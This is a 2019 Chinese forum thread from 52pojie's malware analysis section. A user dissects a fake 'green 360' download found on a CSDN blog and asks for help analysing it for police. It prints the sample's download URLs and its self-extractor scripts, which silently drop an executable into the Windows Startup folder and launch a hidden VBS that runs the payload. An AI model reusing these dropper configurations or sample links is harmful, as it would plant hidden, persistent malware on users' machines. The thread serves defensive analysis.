吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2995|回复: 3
收起左侧

一个CSDN中发现的病毒,有木有大神破一下(没有壳)

[复制链接]
Hackblack 发表于 2019-7-5 14:58
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
病毒地址:https://blog.csdn.net/qq_36916968/article/details/82259641
病毒样本:
  - 1. 原地址:https://swssoftwareshare.gitee.io/sre/dist.exe
  - 2. 防删备份:http://t.cn/AiOZQFOJ

CSDN博客里说这个是“绿色版360”,我看下只有2MB,精简得太离谱了。用WInRAR打开发现里面有一个dist.exe,还有一段自解压脚本

[Visual Basic] 纯文本查看 复制代码
Path=%programdata%\Microsoft\Windows\Start Menu\Programs\Startup
SavePath
Setup=dist.exe
Silent=1
Overwrite=1


dist.exe又是一个自解压程序。自解压脚本如下

[Visual Basic] 纯文本查看 复制代码
Path=C:\temp
SavePath
Setup=run.vbs
Silent=1
Overwrite=1


run.vbs内容如下

[Visual Basic] 纯文本查看 复制代码
   Set ws = CreateObject("Wscript.Shell") 
   ws.run "cmd /c text.exe",vbhide 


那么这个text.exe就是病毒本体了。球、求大神破下,看看能不能搞到什么有用的信息交给公安。

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

TNT-P2P 发表于 2019-7-5 17:06
不太清楚  我看不简单
小猫猫 发表于 2019-7-5 17:59
作者地址:
https://gitee.com/swssoftwareshare
https://github.com/swsyxgs
 楼主| Hackblack 发表于 2019-7-6 08:58
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 21:06

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表